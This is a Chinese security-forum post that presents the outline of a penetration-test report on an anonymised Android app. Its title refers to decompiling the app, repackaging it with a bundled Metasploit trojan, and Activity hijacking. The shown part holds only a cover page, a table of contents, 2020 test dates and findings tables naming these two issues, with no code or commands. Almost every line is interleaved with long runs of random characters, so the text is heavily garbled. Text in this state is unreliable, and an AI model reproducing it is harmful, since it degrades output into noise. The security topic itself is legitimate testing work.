找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 4349|回复: 0
打印 上一主题 下一主题

原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2022-6-8 20:32:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
. _* [) W, F% l8 [# b2 K) U7 Z$ r! e) h( o

3 `, K* p' m( Y ^. D # e, o# U! n7 T3 w7 U0 g2 T
% U7 E! _# Y% F: c! ~1 M7 Z7 J9 `# Z7 P- h7 ~7 L8 ?1 R; W- x1 w

% G: k" _/ g k% M& d8 a & g7 u5 c3 w" y# R+ ~
6 i- Z" L7 x2 T% j' `6 ? e" ^6 B2 x! M/ z9 }) \: G; ^2 a6 V& s( b8 p

1 k _ [; p# O; M S& G7 V3 `6 Q 5 A! Y: B" a, L1 h6 c 文档编号:                ~9 a/ K" k s/ a9 h$ _4 S! T0 ~" Z" t

, @# |+ T5 e3 w6 C ! P! m% W# y( t. z6 w4 A& N: ?

' N4 v) v& R) l% [% o4 |- n) G( |1 A) u, S, A1 X1 K7 }# x   " C# u# K* r3 ]: P# Q9 r2 u7 |* |& D* _0 y* ~! I- ?

2 x- U9 X C9 E3 h: h + @: I& D' J) a/ S* [9 l' d

! @; E2 Q$ q. s2 n2 L4 e7 [- K5 a P. Y1 R   3 V' C$ u: }& K4 e 3 ~& j9 A w8 U5 e7 ~/ ]

% H. o0 I0 a( p' I6 |& j% C3 d. e % G+ o4 l9 m% V

# @ g( ]8 W2 Y2 _1 c4 ~1 q2 s & B( |9 y, D: I& {' H   4 {: |1 H! h+ O* J2 f - i" h9 N" D2 s4 H! e& ?. |

' @8 x/ P( E( a8 |* c* K* e+ ~* m " k" D, q. o. q8 ~* q% Y

9 _/ V8 v* a7 M- g0 i: L B6 k' Q" m1 P) U   5 E! \5 B$ o8 K2 w6 B- w: u) |" [- T, s

5 J* ~3 H( p6 W5 U2 ?! j# q- I) s% B! i

! H4 w9 c5 v7 V- ^2 ?8 u 6 o) }3 p/ s& X1 ~) y   / [0 @3 G6 T' U- s " ]2 n5 W2 C6 j; h

; a- E. I! @, t! l/ j% b( x* }4 q( B 1 `" v- J' ~8 ]4 y' f6 \

' k" `. x9 j+ I' x& D4 J / i6 k& w6 R' F& D* e 某某某APP渗透测试 $ s# O6 e! q' E e1 \9 \- w( L' C2 A! v8 T) \

. m2 C" c) \) o. F* f* Y2 ~& b " ]' g6 o" [5 p) b ?! ?& a* U

9 S1 S4 w1 j9 i, D% e5 c+ N * w" r4 R/ M5 [, q3 E% |   ) ~) X- a8 o, [* F7 y2 m7 @ 4 A0 Q8 P( C C! R4 C

) _$ \2 m; e% E, O; y2 v4 [) u' N2 ]1 m+ \3 h

. ]0 f) `' m0 d8 }- s$ U/ B) [- @ 1 _3 S( `# _. a3 ^6 R0 n   2 C+ C: {% s$ A- q: m) n2 ~7 N7 b ' b+ w, T; E7 }% d

( O9 [3 j- `! i9 X' G p4 T) f " c2 o" o2 c7 N3 y& Q' e

) D2 k/ D0 Q0 a) c" w1 s ; V/ n5 `, ^+ |1 o1 L   * t+ n" H& g* B : q6 G# m& A% A4 l

2 s5 M) w: r6 Y4 |3 Y # y2 j/ B4 Q1 p7 p9 ?/ n* H

, n# @5 k8 m4 c7 i6 `6 d: |0 ~& J( B* v+ w   * ?7 Y7 a0 l2 t0 t6 } V5 v & }5 N% ~8 Y& l6 ]) `

( A. K# `3 ]5 A- @7 w! z! ?) ? 2 ] R* c0 T5 A5 `+ E o

+ C9 [5 p7 c3 k9 Q/ @7 C 6 O9 z9 [1 l: `6 ?. s 技 术 报 告 ; B4 U. p2 V' z5 i0 \8 `" E. o$ Q# ~% Z8 V% q& [+ V* o

X, l' S2 U/ c7 l s; y: D L# ~3 p; h1 J

8 X% J; v8 ~2 t! V% U4 Q % ^. B2 }( I! o v3 v( E D8 O   : G' |- |! L$ f. t8 p) S ; N% B+ |. w6 D7 y: F8 R( _

, P7 r8 f( }8 M8 _! b) j! {2 |. H , U7 N1 S# T+ c- S3 k; P

- k, J. v* ~3 k; d0 I4 s# O6 G- w   - w% m+ L! `5 \* p, y. z1 ` " N5 `" d8 Y' a! s# Q9 k

3 O* m8 m/ B' a: e! O) ?& t 1 e: [' [! ~- z P8 n& T

8 {4 M& g1 t/ r: I+ T , N* L, o4 B5 [& b   ) A8 {+ k4 X; r* A* a: j6 M) B# V5 L# v8 V7 N6 V' C

5 l3 k c; v" J; \9 {9 O9 E" ~6 F* R u! D' r6 A: n

! j" X0 S' v$ @4 k# G. ~/ m( H. q; @6 g$ ~- F( D! `) _( B   $ j) D6 e) b! b' a' ` : i( o1 y& h/ q" c# v( T

6 k7 y5 y# b+ Q& X8 I * t) A+ J9 D6 D% W0 {" H& c/ J

4 M2 K, t, h) c! J2 A8 [/ |$ Z ' N9 W% I. m1 u, f- M   # ~) i; F! c+ L9 ]! V- i$ p 3 B1 v) u! [. z9 }

' d e. E. ~7 S) y+ U& ~0 T) w3 D* }8 H% }+ V1 P; Y2 l" ]0 ^$ S

6 e% u+ y2 p. m. w 3 n! h j+ e2 d6 X+ h& n; l   ' \6 R0 D" j1 ?: x7 O0 w0 a 2 K2 e+ R* l% z9 _5 J

- h2 {# A6 A4 R% f& s# T, u, H6 Y6 E' h! G

' W* }1 j& h5 M ( X0 ?# }9 e9 b2 r7 r+ p1 A   8 h2 s; b# E. T$ R* i _4 }: M: o$ p/ T. j) ]

4 _2 U# L# \, {' d, [, a: z4 s; `6 `! R* b( M& ^* Z$ a. l, \- h" b1 l9 a

7 W# F% n n1 v; b" |5 Z- W 9 ^: b7 a4 n' a3 a! F( W1 O   2 q1 t' p7 h! D) L# j& D6 } ! C' Y8 d- p! r

5 _9 [4 E0 v* k. s; O6 c ( z+ l6 J. c- \; n% @' g

0 u) z9 I9 S4 s, x6 g! x" R! P5 n6 S ; x" M7 T% T+ j# v C( w   $ F# U1 ?" g# \7 x& \ . O: k0 E8 T/ i9 s' m) W! j

8 H9 z9 i5 j7 F 9 z9 l6 K4 A% M9 Y5 ] F7 \

! q9 q- {, Z& l6 r. g5 F* \ * ]' ], @. l' b7 J   ' R8 f1 j# o- G5 e) }* _ 9 @" A8 J# Z' N1 ~: N6 |: ?

! n% a: m% l9 P2 k& ` 8 c. t! |: B* g- j& |$ U

" Z: j k$ p- }! ^ 7 |& _6 @. i h3 a! z4 S9 `, K   # e% t+ }' k# v$ p8 C+ Q! k) ] - @' d( [- e2 g. a) ~, y

) n8 V3 `/ |& h4 ^7 r6 m , ?9 q# ]6 n7 |0 O5 w

" |, K* R# w4 Z- `0 c' f5 v % a, ~ {0 X( B, c" w2 [   : w8 C [3 s/ Z& _/ n- j$ l9 M/ \( y5 Y! H7 S

) V' @5 s, p# L8 ]8 \# T& V4 _& F ?8 Z; W: L5 x9 u2 ^, [

. I# c8 a# m. W) c& _" } ( [; ^( P! t3 p7 ?% X. O+ F   1 Z8 `) Q6 q, r# y5 H , s5 r' q* }7 _8 t7 G& t7 H; B

* V" o3 r1 E2 l8 P0 G2 V8 D 4 K- E4 O0 F: X; { ^! T9 r& w

; i6 x" S. D! B% m . q& B8 G$ W. T1 M! H/ X: i   9 y! A) n- Y {' M4 E7 n & e, e, j# v7 j* P

# l1 l- |3 f6 }" e1 }7 F 5 t* \ P. E% |. |" u) F" Z

0 k) C. y: b, T: N @% O4 X' E: P7 s" a! i' f0 M5 g. T   2 ~1 \$ y8 [' _7 S9 b& u0 e- S O3 v" h, t! V* Q

5 V& g, R! W; d 0 u' l4 ~ Q! G

( x! k) R1 M% ^3 v) [2 A3 I $ k. f# L0 F* D8 B. K' F   8 t# E$ }9 G1 _7 Q8 f1 E- ]+ z$ _ 5 Y4 E) K8 L8 V, j+ V4 D

; }4 V \6 t$ y* e; H6 V8 h3 E7 o # C) W; k+ }! V3 c7 b& }+ I

/ V, b5 G7 X. |$ o * e& `$ D2 r" R* p/ C+ L% U   {0 l3 \5 e B1 k$ I: s6 m% a ! t; N7 n$ L, j3 t

% i3 w/ K: B1 `1 A0 x8 | 4 G7 g/ }* F6 S4 E( L' ]

5 t* D6 @ S y2 ` ( G- Y% Q$ b" [( g   8 T" Y: V: ?! ? + @% c2 j: E+ R6 g

$ b# E7 @5 d$ A- l* X% d" I # r8 H- i$ w4 y R0 G

- F: B. B' c6 {. l6 r 0 ]2 s- D! U D2 i% G" k. C 二〇二〇年 6 `+ D/ M3 H9 c7 t + R' M8 B* j3 E4 n$ P+ P

! t" \/ t8 Z8 b 0 n) W, I% F0 b \8 f# y3 u
' N3 M! x1 o& e 5 x* [! T8 h6 g& {
5 f( G; |$ A8 `( }" y$ o $ U1 r* ^1 U. {- {+ U5 ~# ?5 j! N$ P
8 v0 I* F E' h* B2 H" E/ T' o. J s/ G$ Z# F5 b
# t4 p3 |6 i" X( Y# K9 U 3 z! W; j& b2 h( Z s3 u
" ~4 [$ |6 m6 R- w# v1 p. a6 a6 Y8 W$ n- i3 T7 t
! I' W! s2 Z7 L) d( X8 A1 M 6 t% C- T1 c( Z1 _+ \# p! s
+ m- y! G- w0 z" x& ~2 ` ( Z3 [; e# E' B' x% e/ z
9 x) u+ d, L, L( z) ^+ _ - q: S' ?5 f% \% h% b' A9 d

+ ?6 [5 Y& X1 |8 N7 F9 z " y# J4 Q' H. J0 K* A2 X l 目 录 1 I# M R' a4 z7 |, D 7 D h/ j9 `/ E0 Y, c# q

+ e7 s% B1 {3 D. ^ ; n7 i9 t8 S/ q2 D6 E' b 4 A( y; E) l% {3 h5 e : c- p3 _) D& I( z

# |6 v# |. ^4 E # G; ?* ?3 q3 w/ P/ ~; b3 s) S   1 k# T& _8 T1 r* U# u0 |) M) {" I( Y7 U

% k4 m- F+ b. m+ ]7 _, a . ^2 j: b; u& |

$ ?+ Z( g9 |6 `0 e0 D& `7 n2 V 2 D& ]- L. N5 c; m- h4 @# e 1 概述... 3 $ Q* {+ H+ y, s7 q5 ~4 n , L+ |0 @/ a5 J7 R1 ~) Q5 k

$ r6 w9 b7 k+ L0 c8 A; l 7 B1 X- U" \* O: ?2 O

1 Z) j: h0 c: V! L3 X : w9 n: x+ ^5 n9 u7 I0 N 1.2测试时间... 3 4 m9 H" T- o, f+ L, A/ a2 v4 k- q ) R* N8 W8 w8 I9 K- i

' t0 B$ ?$ P- O2 S6 b ( g2 J7 J- X4 e2 g/ d# S

! r- z4 f) ]- c5 z7 W& K* Y. h! U* K2 q5 U& ] 1.3测试对象... 3 ' ?7 n. F _9 L: `: X* g" _6 c$ H! r6 i } }

% n1 K+ \ R9 G* S : K- x: y" M. |5 K

; d9 U$ `! n" I 8 o I# f+ d' b* j+ n8 s' k 1.4测试结果... 3 ; w% t8 U/ y) }; d' k " L) W5 O. Y: S- \+ ?3 |5 K

* J5 Z8 |; v2 p" y9 K1 i- ?4 ?' j7 P% Q1 M: ]& O" o

( M+ f! y( D: l+ l4 m . a: K7 r" W4 V& V" x; m 2 检测结果... 4 + v4 f( r9 M8 i$ Q y2 S * f- U; a1 U! j/ O' P1 R5 m

5 v+ c. h2 M2 p, s4 } ( ]! V$ M& t% M" P6 l' v- N

7 M8 l& T' r$ `" {2 ]8 Y 0 l* R# A8 y3 S( Z) E 2.1 某某某... 4 . W. \3 Z1 N: B: }& N! s# x- c ' e* |4 t$ R8 E) d

7 A- y7 p6 ?8 ~) b" k + {- Y! d0 O- z+ \. r7 F* a9 a

$ R" A5 Q" c! K- y& l* r6 N. F& o7 p4 P' c$ J: a 2.1.1检测目标... 4 3 B6 z* Y# n2 \. h6 `( q* D8 I 5 i: g: K( [+ M/ R! d

# ]' H0 }, ~7 Z. K' X( k5 A" X# t: a% {0 L1 X3 _: u

V" {8 K" @! [1 E+ v; e. ~5 W2 }# e 2.1.2检测结果... 4 + [9 v: Q/ z& W7 D r( S( z4 w t4 R

2 ?. g0 z5 l/ D! D1 Z I& o) g! H9 ^! h9 z6 r& p' e4 J" S

! s0 ^: q; j; P3 u A4 H . B* n& P* n9 r6 L- _1 G% |9 J 2.1.2.1. 4 $ \8 E5 G. F/ ?5 f- ` ' ~4 {( t7 p1 M

, Q* ]* D4 b7 m6 W( u. t% c: R % ]% f( P7 \6 B9 n% J1 s- [0 Z8 {

$ d3 D4 x6 g+ N 0 ^* [' m* M1 P" u 2.1.2.2. 6 $ [7 y3 N9 ^9 [, N$ y 7 L# Y7 O' ?7 ~% M& I3 }9 U

% C& z- p( A# O0 K. M 2 M+ M5 i, u8 x' u5 a

' ^% Y2 |( S6 E3 u+ }9 _7 A+ z* A c2 t/ k5 j) `) b7 M9 Q 1 R- i2 j4 W& t" X# b % ~( t/ I' H/ ^+ d

& h0 L2 T; }2 |7 f8 | 5 Y( {1 o: }2 v+ `* L
9 v' k q& G$ n6 U2 Y7 C X3 o& Q7 a) ~4 {! F
) ~ m8 m. l; a! T' L; h. J4 i8 s7 g ! ~& Z% t0 ?3 C8 E! B% I
. R$ A! ]4 t. u3 Q - @( L; ~8 E3 M! E3 x/ I% a4 |- }
4 J* u2 t! Y4 B+ }- I3 N h , R' G j* ?$ w3 q2 w

! t T; A+ }, ^+ }* L7 C+ ]' U: d/ D: d0 z 1 概述 & j3 H: n5 z/ w' Y, j9 E/ I0 w* t 7 L+ l. Q# U+ v4 q4 u% Y) g/ n) g

8 s2 V' Z$ g! G# g* b7 A 7 T; R9 `! @: R7 q

: W- z0 L, P0 ] - c) ^4 c/ m( d7 x. ] 1.2测试时间 & \6 S& }1 e8 W) C3 B0 d9 I d* I- K( y" f( c" y6 Y8 }

1 k. p) E3 D; k8 E: B6 r+ m$ O7 j7 b' [. e2 I! l 0 `, H4 P0 w! Z* d; m+ @3 ?/ ^& s! C9 J& P% K1 ^9 j" r$ Q b& [" i+ A {9 p6 G; ~5 U5 G/ Y6 }' M% w# u. b/ w7 s' z {& j2 O# q [, x' P( f& Q( f6 {- f! g4 K( b. \0 K. K2 o8 S* E# m: _2 d, R% }- E5 L. j4 v; Y, D- l) g( x5 W/ l) s# P1 i! v# X/ ^0 \3 G5 J' F' d( F" {+ a0 P( O. {8 e4 ~2 x* H. V0 ^( i2 T% |* `8 o# c7 U ^' e+ O. h. o3 V- d; Z" P% Q% k j5 j+ O" A G' t* P$ O) ^' P) v8 W( ^; z+ N4 ?+ ]) W$ x- K' S x& P) S- i2 W# i, L- S' L% q; W2 q7 V% N" e4 l! i( u; S, w6 n* n5 F2 o/ j: \1 b* u$ w$ I/ J- i- a1 v* o4 n6 Z% B. y6 c4 U5 W; Q/ `# p* I! f' m( Z9 m8 [6 P' `* |! D1 n# f# _. R/ F' g7 K4 x" w% W5 v7 b6 ~' x0 `( }/ u
. L! `& h x" D 9 |6 P# |* g/ N- O: H

- I* ?0 w: t: ^5 N) E1 J, Z 0 ?7 F' S( {3 r$ S/ a' X0 Z$ n 渗透测试时间 6 Z0 o, v2 [) K( m ]1 z/ ]# g ; k; u7 C9 F) _3 e, b- N: U

: @. W; t+ s3 j. A0 ^% P) \( t0 s 1 ?8 n: I6 i+ n
/ |8 D, o3 z% c" R 2 j- K& d. I- @

( p# _( P: H: o % G( `# F7 h- o$ A( z4 I5 G U 起始时间 4 [4 m4 B9 e1 u- e" j0 q: _ 6 l( Z* ]! W. o: B" Z# L

g# W( a( `, w3 e0 d0 I7 p! P2 ~+ o1 a
) c) V$ ^) S3 a* r3 @: F 3 f! Y7 C) o. v$ k

+ t- y2 s: b# ^" }7 i! m0 u ' |3 e; v, g; ] } 202046 # d0 i' [8 D7 ^$ q$ A/ W. S' u p, R

* ]4 E/ o" V5 m " Z# a0 a# m3 D6 s9 H2 A. e5 n& H+ |
?/ X, z; u" H" Z }* f . ?, { e9 y! {, ^

8 U% d2 x; j7 v; \ [# U) ? 4 f$ l) p* q r7 {7 u& y 结束时间 9 u% ]3 y* |4 b4 [* G ; L( x- }7 U) u5 o$ T

( D4 ]1 f' k% u) g% z6 q+ v , z- j; Q8 T. h% a
' N1 h# K' `4 B0 q; C# D, K, X ! v; P# {& d+ w0 G; `( t

% [* S: S' F0 [) }7 T( Z ! e% D( D* f+ ^( R2 K& f% E 202049 " q! E( X( l' R" A' \. I& X' N n

$ x6 \ N" b8 ~) A3 N1 {9 ]8 G/ C! L) d1 Y; C. e) s
' S) y2 ?" Y5 F& _7 a8 `/ K 9 |8 O7 X- i3 g% Y

& \* _' @, m& ?0 O" r; T $ A5 q3 y- k) _ T% o 1.3测试对象 $ s G, e) s& a, n. X" z) B; { 0 X/ q% Y% \2 |/ N3 Y9 s

, R. {- @# @2 f: Y/ a7 b; F8 T" R/ C + u1 j e; l' c( Q, A4 J/ [% M

# P' P" b. _' n6 |: Q ' a4 ^* q# ]" k. i9 I 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: 8 r: E$ p, r" U& z/ c1 B; j 0 L, |6 M# t( r0 e" }* q

9 w( f8 U- G9 U0 R: U ( T$ l4 d; a+ a

6 }7 s, ^- ~3 x" g; h# q) c. ^ W+ D 1-1 检测对象 , a% o8 ?% k/ v# H, C, `+ L( ?( W$ L & t q f# d1 K1 ? E

0 C! A; N/ Y* R+ a9 h" F. w" b' R' V3 y8 l3 r+ a/ T' a W8 t' g2 \ v7 v2 J+ g+ }3 j: o( ]* R% Q1 i+ O: }; ?( U) _8 V+ u) [) P& I2 ?3 Y+ I( ?) f7 t/ v0 u+ V) G1 n0 Y" T9 t ]) R' K( ~* }1 G% I; ^0 F1 n+ {! @% q0 `# K1 ?" [. q5 V/ t: f3 @% G- u7 _0 y- v/ R! C8 E8 t! d& F! n: U$ T8 L- W* U6 x& ?: n% N4 y( r; @; `8 I+ r- G5 e! P$ r3 }6 W& b( f0 ]% {) d3 F8 @7 t, `; p9 T7 W: j% M) `1 D1 m) Z' Q4 o& S, r: L- ^: b3 o* S# T5 J4 i- Q; h; H$ [* t0 ^% h8 t+ Z% ^4 y+ c/ {$ G. I; Z/ m3 q7 n" h- s: M3 w0 K5 s8 ^* J; E& x- h& S+ |; O7 z$ \# _3 P4 _" P) B+ l( K' w" H3 q6 h1 ^- t! w% f m2 }2 ?: S, K1 x- e9 y0 M5 {$ i1 Z- i* Q0 }2 E \2 A- v- c# r' G4 S3 t5 T' z' l/ k0 y J( e: V3 T" p/ s( M9 S" E3 ]8 t) f7 `
; D w1 Q( n1 Q) C& |: j; j _! D) f S E5 b( ~* _+ G6 o

2 f' `9 a1 [; o0 h" x8 {! ] 2 E/ V0 L8 M- c) M: q 序号 . O2 t5 d) o, F1 F5 L3 Y4 X+ {2 ?; K( \3 }+ U: M- {; z5 b

% H: X* f K; K' `& C3 s; d5 t& I & ?, H) D* E+ @3 M+ K; \5 x
2 u& M2 n8 }6 _0 D* c" y/ T/ L, x9 m+ P# Q! ?

; J9 Q$ O) Q" U0 G) y $ c% i8 s* d) q* ~" `' h 测试对象 4 x/ A8 I/ p5 R5 l% c: N* r6 u) t

1 ]/ v. D8 H( ~' O* _) r2 b7 z- p7 E3 O, [+ [# n0 u" A/ [4 _
; \; H3 E e' J$ g, K4 f/ f3 O " @2 @' L# |. F, g S

, k( a4 \) T) A, | + Z7 [: c! E& C1 m8 {- y 测试地址 - \: K; g; O0 w" L1 F1 ` ) y1 P$ J0 k; q1 u1 q8 |! @

' g: L: ~, ^, B: V; n* \ 5 x2 A0 w) y% x& |# ?7 d n6 Q5 |
6 H& R3 B+ F7 H8 o7 f0 [8 T1 A" k 7 ]0 n9 [# I& g2 ~: U0 m, W

+ Y8 x: [$ |& _+ { * e$ N$ R4 S9 k0 W" c 安全漏洞 8 W+ i+ I6 N! j b" l3 B$ x , D3 d5 [0 m) L7 F& t

% A( L7 ~# C3 Z1 `6 M0 H3 D " ^( @. ?4 Y; H% K& p, G
' ]# q2 E5 E) ?; J' i$ K G% M8 b( ` m$ Z# G

( W0 B& v, i. |. K; @& [+ n, t$ g# A6 a 1 ' p/ z. u6 H8 m7 P8 Z 4 x' b$ v5 j: R2 D% A2 V

* v1 L% W: W2 ?2 Z1 K; l / i* q4 F% I) S0 b3 w
A( H6 ]) N- y& Z! e. w2 Z , n2 F1 t0 Q' n" T! X

# H# P" k& U: r- T6 I; b T ! F% @& i, q, B0 d 某某某安卓APP 0 D, O7 E+ P- D" u& P3 ?- M % d3 j9 M( @& ~; j/ f; w

5 |2 \; k2 v: N ' L4 Y% S4 n( b/ N
1 X0 B1 E V& \9 v, \ K% t; ^; x7 C; @+ Q

1 U7 v+ D+ @; v9 y% i+ [8 Y4 e8 X8 {7 m* m X" c% n   ; K' E. q& ]- ^& o" `) M; _ & s) K! ^# s: ~$ H

( h7 d" K# w: i% m6 I) I- w% g . Z0 d) M% v; N
8 Z: k0 Q3 l( W 7 w$ [; H! i2 {7 J* L/ K& ]/ q

$ ^* X( C7 H- T5 y : |- N3 D( @" x* D 2 " R% g! j: j* @' ]! E3 k " g4 _% u [/ V/ V8 J9 [ |1 c

/ W4 `9 F" G5 \/ R, x5 y7 ]7 k ?3 g v9 j' \1 r
% z4 F6 ^; U5 n B; M % h- C9 [7 ~6 M( D% z

6 C& H- G& r1 A1 A % y3 l* E( n0 J" h7 l5 ? 1.4测试结果 6 G/ F. d' d0 q4 e1 x4 A! H 4 [! e, q ~, z6 e6 N% d: K! h

7 \9 z3 e5 w# t1 m8 P; K " r, m! G# A3 s; j2 J2 H! U8 K3 y

1 {! S4 j% I4 D, k, x3 t 2 }+ \% t" M0 X, l7 e) T* e4 f7 O 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: 9 o- T' I0 r( H- I$ o# g; X/ w3 H( h" r, L! G) I, A: q4 ~

2 C& [! N9 `, e/ T) z; Z / K" ?4 U4 x5 y

( f0 z& J. L9 [2 { 0 m! L: ^& k0 Y   - o# y5 G; c+ z) V2 K" |: I# I/ F# G% K: [2 E( x; V

5 D8 l0 s, g/ X ! k, Y! K$ p) k( S% N" J
% N5 o. N: z8 M( ]6 q# }5 z) L4 C- B ! [7 D2 n) p5 Z- K. W* r : s3 V8 ?+ | t" y5 N! d0 m; q$ _0 p7 n i! R2 H5 M2 J3 t% N2 a" r( {4 \. l1 L+ k M! K" A/ A1 H& o* L H$ c( p" |2 M* Y; _' n9 c6 `- m" t. L8 O( [2 u! p' @( ]. Z# a# e3 N2 [* ^ h" A0 ?2 K, P6 ^" v6 D4 |5 X, w$ Q4 h8 x& i$ m* m. k. H/ f& D3 V+ H& x0 Q& h# E0 X8 {* q1 K1 ~# D2 I' p. N& X5 A+ _; i, B/ h9 O3 s. L2 ]( E8 j+ _, A8 t- m4 G! B, `- s9 c3 ?8 i! Y r/ x6 t( V, Y/ t+ m4 d* h/ [; j4 u, t/ H) F* |" Y+ _8 ]* E- W5 c% j/ ~6 y) f# ^# `( e/ A' |) e* K5 H* c8 d4 n2 L Q+ V9 t, W$ W8 Y" q K7 |: {4 Q' I& N$ `% h2 P3 |) W2 F7 ~! S( n' W( F: [, d3 o# Y2 k" A, u4 s3 _# w6 w1 a# Z! {0 G& a: Y# j( `1 T3 ]% v* T" f& O5 K, d: a/ a n6 A( u1 m6 L3 Z" ]1 J1 h! V, X% e" @8 s5 A' U5 ^+ k C! y# B" i/ K- [' y- d& Q9 _1 K! z# p6 W- x* K/ i" f! V J3 I+ X; j! X9 J+ Y' \7 I6 f* ] w& U+ r, U# Y( \1 l" Q! D% c+ g% P6 o( c0 g, q# t9 [, P A% A' L# B3 a0 u, E/ L- e, [# N6 a' {$ i# Q: D4 z- ~7 k v) R6 o3 Y5 w! \4 X2 Q0 Q( ^% z( E7 H- ?8 [. q O* `- B' p' \' u4 X* g% J# @/ [3 X/ p! s( Y; p3 \; J5 y; ~2 S1 T; Z* Q9 j2 a* S9 e2 ~1 q x: J' S% b& P' ~$ V( n* A% K4 g! a! v' D! d( X/ O- @' V' b3 J; U+ D. S! S0 x \5 l7 p: i* q! c p5 C9 h
/ C9 l6 j3 T$ ]3 N& D! c. k$ h 9 w" [+ E \" X2 z0 `. p% A

2 Z; e; m- W/ t! A ! i+ A: B9 n4 u2 ^. E 序号 # f3 ], j5 i4 {1 C' v" `( b9 X % y; G! a& f% j* _) D- n6 L" l% U; W

; R1 {1 n) I0 V: ~5 S | . ]( u, M' Z) H' A% H+ I1 i
$ O9 d5 u, i+ h- T4 {' V+ Y& }3 _! n( b. W

1 v' i* X% y: n4 w& u+ g ! a) X/ T& N1 G% d5 m4 b 系统名称 ( l x. B) {- G0 M 9 F4 M- \& e* W+ `9 }

" A( B9 S# U# r- ?) T / D! D' C& p, M! D
, M7 M0 I# b4 F% f$ S 4 @/ `" n5 h: D

, }9 B6 ~$ K, k$ W6 Z' U5 T7 F( b4 a+ d: o* p& [& R 漏洞名称 % J2 ?# Z, m2 A; J% I- A; m9 R$ @

/ X9 s4 q; L9 s% T% G 6 a6 M& `2 T, T/ h
/ C% K5 _& b% D4 Z4 s) v- E" ] . I j2 X" r" Y8 `

f( C. M: z6 F9 c+ o t $ e' n% v' i3 i8 b 漏洞危害 # `2 R9 g! }8 h7 P) A+ ]; X : \" Y4 j2 B- O$ C$ e, S

9 N. F8 ~3 g$ J$ i- c; B6 l2 d 2 ]7 t. O! e0 B1 `$ `+ ]) G4 K, p
, n4 `2 b( i+ ?+ c* n: G" I f% q5 O9 d$ G

* Y }# o0 U$ a7 \ 9 V' x. |. l$ v4 \! R 修复结果 / n3 T4 Y% q" F* E. _3 V8 H" _2 E4 ^5 `8 w. t

9 n. B8 i9 _# u6 k. N/ @ e- Z+ y7 e' M% _: n( f0 _# J& Q+ E
1 V5 B0 {6 Z0 r& E# m, ~ $ k" \3 {8 E W$ z- T; q% K( ^

% }6 f- i8 O: _% P! P . I: K; [8 \$ d8 X' \* T 1 ! Z6 t7 _6 F6 H; C4 K: U( _5 m* |

$ l6 C. a" Q; R9 b/ }( _ + Y4 j/ U" j* {" U0 u
Y7 C+ l% C$ J7 R9 \9 E5 b" N : S7 g& b. u. g

! ?6 ^* @( n9 A* n0 U$ ?; ?3 ]( g9 W . y. \; U M5 m, u; m/ p0 A 某某某某某某APP 4 Q5 j4 l4 K1 I) q 4 _" o3 [, F3 C2 I) G

9 ~+ G: s- D4 \3 {# V3 L) z # h( l( p r t& R
" q; c0 G) o ?0 E6 G5 r: E* L+ h7 V" x- o! h) n

5 Q- Y! r6 k+ o% |6 P* d% S) B5 p7 g3 {7 l& h7 w5 Z7 v% U% s! R3 N Activity 劫持 - C, f) D N" h% E' j( Y + z5 G9 F. w) z% V% D+ M+ k# S

- L; S' t" x C! c( U6 D+ B- b) @3 W% T

- q" |# y& C1 v* t+ [ & P# [5 b& E8 ?5 E+ r( n/ e   ' }( ~3 x& D& q8 b9 Y f* M) c( `$ M7 f. t- T8 s

5 [8 ~' |. k% U: Q" p# t1 V8 Q( z# ^/ L( l( b0 K1 }
0 N. X4 [. V6 k 7 f. e. C/ R* F) P6 s$ w

& n, p c- E `- ?, ` ) h. W6 R( ^2 O# @& [3 k% b $ m" v% i: j; U+ K# u . ?4 y/ F3 S9 E2 j1 n

7 Z1 v! v3 D$ x% p6 M ' R/ U& o+ E$ {4 i1 o9 b/ h
' M9 u' u$ E A4 P9 c: \& E5 L6 c$ n6 T

1 C( _9 W7 n/ M( [2 U# U . _$ G# w2 L9 l3 P1 \9 k& e3 H   ?$ Q1 h# {9 D , d: _, j, k1 ]0 Q9 [

" v1 h% {; Y! L: k$ k% Q) d: G ) @3 ~. C% d0 X$ W4 f& ]
4 ?& T: S4 ~5 M+ l T% G4 ^ , v# s I) l5 v+ d

" Q6 [, l7 T; I [5 d. t3 C& \" {$ Y' T2 h$ x7 C: n 2 " ^$ y3 [" d4 R' R/ ~ ( M2 h& p2 `' v+ y; J- n- i

+ R( h) S, K0 H( Z5 I% y8 V" B * o% d9 _, n0 c# i, ]- T
$ @1 ^0 B4 r/ z# ^! v# U' r1 v 1 Y7 _" R- d- m

" `: R% s/ f8 ~2 l! { " i( Q2 r( I4 z+ g 某某某某某某APP _. h9 T0 k) G% H' ]$ ]( l) h% \5 {) d5 {: O- I- J

4 b/ @5 O" M: W1 G 2 K+ P3 n' H: ^# [/ h
6 V3 j4 |) B. F' X& n0 G# v. ?6 v" Y6 n" z( L/ m2 U. S

' \# h4 ?& V, J' h% j7 C' { 4 h+ o. v- y) b6 d: X0 t 反编译二次打包捆绑木马、篡改APP代码 % h; e1 O+ K5 D$ Y0 G: E: B5 A+ c. L. V

2 b, n2 Y! E1 s7 y2 m6 T) r 9 Z( F# e! o5 l+ ]4 \0 Q
4 t# ?* P1 D' z, o , g! z- n, J+ z1 z% s

! j5 f9 M. `- e; M- \) F 4 G2 L1 s2 h4 k; C % h7 @% T4 ]% V+ L! @! l 8 m+ B/ M: X7 e; [8 v

+ `2 H1 I2 n/ o+ q/ ^' e' f% p$ |. V$ z, c7 e
% [1 t7 O6 S6 @) v) b9 P } - c# P g o9 F1 I

; |& c8 V/ m& x* ~) a6 D7 V% g8 v, l   & v3 z4 M9 z7 [/ t1 G: _ J5 A 7 ^8 }. u/ a6 a! T# H0 [/ l( F

4 R$ s. Y: Y' c E) n" K; b# V * S1 d0 ?& b0 o: P$ ~2 I* w- I
) o0 p% C8 [5 V$ B/ S+ Q* _ a0 u. w& v6 u7 v' T ^1 _0 v
# W: |6 ^! x% L( p7 [; J) X; r8 M) Y3 x( L, J& |/ k

9 k% s* }, `3 s6 F3 L8 I 9 X( @# j# _' e8 y/ o   + p) y6 W; W" M3 K8 v1 I ; L. c1 y4 C3 m% N. ?

! P1 C( a, A" r" B3 t% x2 @+ b7 T6 G( C% ^. K4 V6 h& r

